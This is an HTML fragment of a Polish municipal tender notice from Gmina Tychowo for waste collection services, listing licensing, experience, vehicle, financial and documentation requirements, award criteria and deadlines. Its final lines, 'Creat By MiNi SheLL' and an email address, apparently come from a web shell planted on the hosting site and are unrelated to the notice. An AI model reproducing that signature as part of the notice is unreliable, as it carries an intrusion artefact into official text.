<ul class="kh_indent_1"><li><p>1.	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
Warunek zostanie spełniony jeśli Wykonawca
1)	jest wpisany do rejestru działalności regulowanej Gminy Tychowo w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości prowadzonego przez Burmistrza Tychowa;
2)	posiada zezwolenie na prowadzenie działalności w zakresie transportu i zbierania odpadów, wydane przez właściwy organ zgodnie z ustawą o odpadach;
3)	posiada wpis do rejestru zbierających zużyty sprzęt elektryczny i elektroniczny prowadzonego przez Głównego Inspektora Ochrony Środowiska zgodnie z ustawą o zużytym sprzęcie elektrycznym i elektronicznym;
4)	posiada aktualne zezwolenie na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów komunalnych lub gotowość przyjęcia odpadów komunalnych przez przedsiębiorcę prowadzącego działalność w zakresie odzysku lub unieszkodliwiania odpadów. Miejsca odzysku lub unieszkodliwiania odpadów, o których mowa wyżej powinny spełniać warunki określone w ustawie z dnia 14 grudnia 2012 r. o odpadach  i ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach,
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeśli Wykonawca udokumentuje, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował w sposób należyty usługę odbioru i wywozu odpadów komunalnych od właścicieli nieruchomości w ilości co najmniej 400 Mg. Wymagana ilość powinna być odebrana i wywieziona w okresie nie dłuższym niż 12 miesięcy.
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeśli Wykonawca udokumentuje, że dysponuje sprzętem specjalistycznym do odbioru i transportu odpadów tj. co najmniej:
	1) dwoma samochodami przystosowanymi do odbierania zmieszanych odpadów komunalnych 
z  pojemników o pojemności 0,12 m3 -120 l, 0,24 m3 -240 l, 1,1 m3 -1100 l;
	2) dwoma samochodami przystosowanymi do odbioru selektywnie zbieranych odpadów 
			komunalnych;
	3) jednym samochodem do odbierania odpadów bez funkcji kompaktującej -kontenerów 5 m3, 
	    7 m3 lub o zbliżonej pojemności będące w dyspozycji Wykonawcy;
	4) jednym samochodem przeznaczonym do mycia i dezynfekcji pojemników;
5) jednym samochodem o obniżonej ładowności do odbioru odpadów komunalnych z miejsc o 	dojeździe  utrudnionym dla pojazdów o większej ładowności.  
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunków udziału w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony poprzez:
1)	posiadanie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum ? złożonej przez niego oferty,
2)	posiadanie dokumentu  potwierdzającego, że wykonawca posiada środki finansowe zapewniające prawidłowe wykonanie zamówienia bądź posiada zdolność kredytową w wysokości - nie mniejszej niż 1/6 wartości złożonej przez niego oferty -informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, wystawionego nie wcześniej niż na 
3 miesiące przed upływem terminu składania ofert.
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Podanie ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenie dokumentu potwierdzającego, że usługi zostały wykonane należycie.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okresowe mycie pojemników - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne postanowienia umowy zawarte zostały w Załączniku Nr 2 do SIWZ.
2. 	Istotne zmiany postanowień niniejszej Umowy w stosunku do treści oferty Wykonawcy, możliwe są w następującym zakresie i przy zaistnieniu poniższych przesłanek:
1)	zmiana wynagrodzenia Wykonawcy w przypadku zmiany powszechnie obowiązujących przepisów prawa mających wpływ na koszty świadczenia usługi -np. w zakresie zmiany wysokości stawki podatku VAT oraz w przypadku rezygnacji z części zamówienia wynikającej z zaistnienia okoliczności powodującej, że wykonanie jej nie leży w interesie publicznym,
2)	zmiana terminu wykonania Przedmiotu Umowy w przypadku działania siły wyższej, za którą uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu Umowy, a których Strony nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie Umowy zgodnie z jej treścią, 
3)	zmiana zakresu i sposobu wykonania Przedmiotu Umowy możliwa jest w przypadku rezygnacji z części lub wprowadzenia nowych posesji określonych w załącznikach do umowy wynikającej z potrzeb Zamawiającego oraz w przypadku rezygnacji z części zamówienia przez Zamawiającego, jeżeli będzie to niezbędne dla prawidłowej realizacji przedmiotu umowy
4)	zmiana w zakresie podwykonawstwa w przypadku:
a)	zmiany podwykonawcy wskazanego w ofercie,
b)	zmiany części zamówienia którą Wykonawca zamierzał zlecić podwykonawcom,
c)	wprowadzenie podwykonawcy w przypadku gdy Wykonawca oświadczył w ofercie, iż wykona przedmiot zamówienia bez udziału podwykonawców.
3.	Strony dopuszczają możliwość zmiany Umowy w zakresie niedotyczącym istotnych postanowień Umowy w stosunku do treści oferty Wykonawcy, a w szczególności: 
a)	zmian redakcyjnych Umowy,
b)	zmian będących następstwem sukcesji uniwersalnej albo przejęcia z mocy prawa pełni praw i obowiązków dotyczących którejkolwiek ze Stron,
c)	zmian danych Stron ujawnionych w rejestrach publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> umig@tychowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Tychowo,  ul. Bobolicka 17,  78-220 Tychowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2015 godzina 12:00, miejsce: Urząd Miejski w Tychowie,  ul. Bobolicka 17,  78-220 Tychowo, pok. nr 9 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com